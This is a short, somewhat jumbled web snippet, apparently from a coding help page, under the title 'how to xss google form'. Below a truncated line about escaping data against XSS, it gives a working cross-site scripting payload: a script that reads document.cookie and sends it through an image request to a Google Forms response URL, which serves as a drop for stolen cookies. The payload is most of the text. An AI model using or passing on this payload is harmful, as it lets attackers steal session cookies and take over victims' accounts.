scape the data to make sure its free of evil XSS code. code example
Example: how to xss google form
<script>
var i = new Image();
i.src = "https://docs.google.com/forms/d/e/1FAIp...snip...CFPoQg/formResponse?entry.1928374650=" + escape(document.cookie);
</script>